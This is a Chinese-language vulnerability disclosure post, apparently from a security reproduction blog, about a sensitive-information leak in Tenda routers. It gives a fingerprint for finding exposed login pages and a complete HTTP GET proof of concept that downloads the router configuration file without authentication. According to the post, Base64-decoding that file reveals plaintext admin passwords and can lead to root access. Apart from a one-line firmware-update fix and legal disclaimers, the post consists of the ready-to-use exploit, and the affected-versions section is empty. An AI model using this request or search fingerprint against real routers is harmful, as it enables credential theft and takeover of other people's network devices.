文章总结: 文档披露腾达路由器敏感信息泄露漏洞,攻击者访问特定路径下载配置文件,经Base64解码获取明文密码及Root权限。文章提供了POC验证方法和资产测绘语法,建议用户及时升级固件修复。
综合评分: 78
文章分类: 漏洞POC,IoT安全,渗透测试,漏洞预警,漏洞分析
腾达路由器敏感信息泄露漏洞 附POC
原创
安服仔
安服仔
北风漏洞复现文库
2026年1月27日 10:11
广东
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
#
01
—
漏洞名称
腾达路由器敏感信息泄露漏洞
02
—
影响版本
03
—
漏洞简介
腾达(Tenda)是知名的网络设备制造商,其路由器产品覆盖家用、商用等多个场景,以高性能、易用性和稳定性著称。腾达无线路由器致力于为家庭用户提供舒适、便捷、自然的智慧家庭体验。简单便捷的部署在家庭中,彻底解决家庭用户的网络接入问题,并提供高速稳定、多终端接入、低功率低辐射的健康好网络。攻击者通过访问/cgi-bin/DownloadCfg/RouterCfm.jpg路径可获取路由器配置文件,文件中包含加密的账号密码信息,经Base64解码后可直接获取明文密码,进而登录路由器后台,甚至获取Root管理权限。
04
—
资产测绘
title="Tenda | Login"
05
—
漏洞复现
POC
GET /cgi-bin/DownloadCfg/RouterCfm.jpg HTTP/1.1Host: xxx.xx.xxx.xxUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: */*Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: keep-alive
06
—
修复建议
将路由器固件更新到最新版本
07
—
往期回顾
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:北风漏洞复现文库 安服仔
安服仔《腾达路由器敏感信息泄露漏洞 附POC》